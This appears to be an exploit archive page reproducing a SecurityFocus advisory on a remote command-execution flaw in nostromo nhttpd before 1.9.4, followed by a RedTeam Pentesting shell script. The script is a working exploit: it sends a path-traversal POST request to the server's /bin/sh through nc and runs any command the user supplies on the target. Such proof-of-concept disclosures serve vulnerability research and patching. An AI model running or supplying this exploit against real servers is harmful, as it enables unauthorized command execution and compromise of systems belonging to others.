33 lines
No EOL
993 B
Bash
Executable file
33 lines
No EOL
993 B
Bash
Executable file
source: https://www.securityfocus.com/bid/46880/info
|
|
|
|
nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.
|
|
|
|
An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.
|
|
|
|
nostromo versions prior to 1.9.4 are affected.
|
|
|
|
#!/bin/sh
|
|
######################################
|
|
# #
|
|
# RedTeam Pentesting GmbH #
|
|
# kontakt@redteam-pentesting.de #
|
|
# http://www.redteam-pentesting.de #
|
|
# #
|
|
######################################
|
|
|
|
if [ $# -lt 3 ]; then
|
|
echo "Usage: $(basename $0) HOST PORT COMMAND..."
|
|
exit 2
|
|
fi
|
|
|
|
|
|
HOST="$1"
|
|
PORT="$2"
|
|
shift 2
|
|
|
|
( \
|
|
echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
|
|
echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
|
|
echo "$@ 2>&1" \
|
|
) | nc "$HOST" "$PORT" \
|
|
| sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP' |